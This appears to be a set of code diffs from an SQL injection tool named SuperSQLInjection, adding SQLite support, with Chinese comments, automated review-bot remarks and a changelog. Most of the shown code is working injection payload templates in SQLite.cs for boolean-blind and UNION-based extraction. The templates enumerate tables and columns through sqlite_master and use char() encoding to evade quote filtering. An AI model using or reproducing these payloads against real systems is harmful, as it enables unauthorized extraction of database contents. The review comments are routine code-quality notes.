</value>
</data>
<metadata name="cms_dataPacks.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>138, 55</value>
</metadata>


@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.2019.01.02")]
[assembly: AssemblyFileVersion("1.2019.01.02")]
[assembly: AssemblyVersion("1.2019.01.04")]
[assembly: AssemblyFileVersion("1.2019.01.04")]


@@ -143,6 +143,7 @@
<Compile Include="payload\Access.cs" />
<Compile Include="payload\Comm.cs" />
<Compile Include="model\Injection.cs" />
<Compile Include="payload\SQLite.cs" />
<Compile Include="payload\DBPayload.cs" />
<Compile Include="payload\DB2.cs" />
<Compile Include="payload\PostgreSQL.cs" />


@@ -13,6 +13,7 @@ namespace SuperSQLInjection.model
SQLServer = 3,
Oracle = 4,
PostgreSQL=5,
DB2 = 6
DB2 = 6,
SQLite=7
}
}


@@ -0,0 +1,97 @@
using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class SQLite
{
//加载对应配置(需要读取的环境变量)
public static String path = "config/vers/sqlite.txt";
public static List<String> vers = FileTool.readFileToList(path);
//表数量
public static String tables_count = "(select count(1) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101))";
//获取表名称
public static String table_value = "(select tbl_name from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) limit 1 offset {index})";
//获取列名称
public static String column_value = "(select substr(sql,instr(sql,char(40))) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) and tbl_name='{table}')";
//获取表数量bool
public static String bool_tables_count = " " + tables_count + ">{len}";
//bool方式字符长度判断
public static String bool_length = " length({data})>{len}";
public static String check_li_value = " length({data})<{len}";
//bool方式获取值
public static String bool_value = " unicode(substr({data},{index},1))>{len}";
//bool方式获取值
public static String bool_noUnicode_value = "{data}>{len}";
public static String unicode_value = " unicode(substr({data},{index},1))";
//获取行数据
public static String data_value = "(select {data} from {table} limit 1 offset {index})";
//union获取数据条数
public static String data_count = "(select count(1) from {table})";
public static String bool_datas_count = " " + data_count + ">={len}";
//union获取值
public static String union_value = " 1=2 union all select {data}";
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "char(94)||char(94)||char(33)||" + Comm.unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append("(char(94)||char(94)||char(33)||" + dataPayLoad + "||char(33)||char(94)||char(94)),");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getBoolDataPayLoad(String column, List<String> columns, String dbName, String table, int index)
{
String data = data_value.Replace("{data}", column).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{orderby}", columns[0]);
String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
return payload;
}
}
}
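Review bot: getBoolDataPayLoad reads `columns[0]` only to fill an `{orderby}` placeholder that the `data_value` template does not contain, so an empty `columns` list throws ArgumentOutOfRangeException for a replacement that can never apply. The `{allcolumns}` and `{dbname}` replacements and the second `{data}` replacement are likewise no-ops against this template, so the body reduces to `return data_value.Replace("{data}", column).Replace("{table}", table).Replace("{index}", index.ToString());`. Both getUnionDataValue overloads also call `sb.Remove(sb.Length - 1, 1)` unconditionally, which throws when `columnsLen` is below 1 and the builder is still empty; `if (sb.Length > 0) sb.Length--;` handles that case. The public static template fields are never reassigned in this file and could be declared `static readonly`, so that no other code can change them at run time.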


@@ -683,6 +683,17 @@ namespace tools
return "";
}
public static String strToChar(String str,String encode,String joinStr)
{
return strToChrOrChar(str, "char", joinStr, encode);
}
public static String strToChr(String str, String encode, String joinStr)
{
return strToChrOrChar(str, "chr", joinStr, encode);
}
/// <summary>
/// 转换chr供SQLServer替换库名防止单引号被拦截或过滤
/// </summary>
@@ -1213,6 +1224,19 @@ namespace tools
}
}
}
public static List<String> GetSQLiteColumns(String sql)
{
List<String> list = new List<String>();
MatchCollection mc =Regex.Matches(sql, "\"(?<column>\\w+)\"[\\w ]+\\,");
if (mc!=null&&mc.Count > 0) {
foreach (Match m in mc) {
list.Add(m.Groups["column"].Value);
}
}
return list;
}
}
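Review bot: In GetSQLiteColumns the `mc!=null&&mc.Count > 0` guard is dead code, because Regex.Matches never returns null and a foreach over an empty collection does nothing, while a null `sql` argument still throws ArgumentNullException from Regex.Matches itself. A guard such as `if (String.IsNullOrEmpty(sql)) return list;` before the match covers the case that can actually occur. In the first hunk, strToChar and strToChr take `(str, encode, joinStr)` but forward to strToChrOrChar as `(str, "char", joinStr, encode)`; since every parameter is a String, a call with the two swapped compiles silently, so a `/// <param>` line for each argument would help. The enclosing class starts outside both hunks.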


@@ -1,4 +1,9 @@
20190102 V1.0 正式版---
20190104 V1.0 正式版---
修复SQLServer盲注由于表名替换错误导致列获取不成功的问题。
优化配置文件。
新增支持SQLite数据库的注入支持盲注和Union方式暂不支持显错模式,SQLite支持3以上版本如果是3以下版本由于不支持部分函数可能无法获取数据。
20190102 V1.0 正式版---
修复order by判断成功列数后还是按照默认最大列数进行测试的问题。
修复字符替换时,将字符全转小写后在替换,导致部分情况下可能导致语句出错。
优化环境变量显示方式,可以选择想要获取的环境变量进行获取。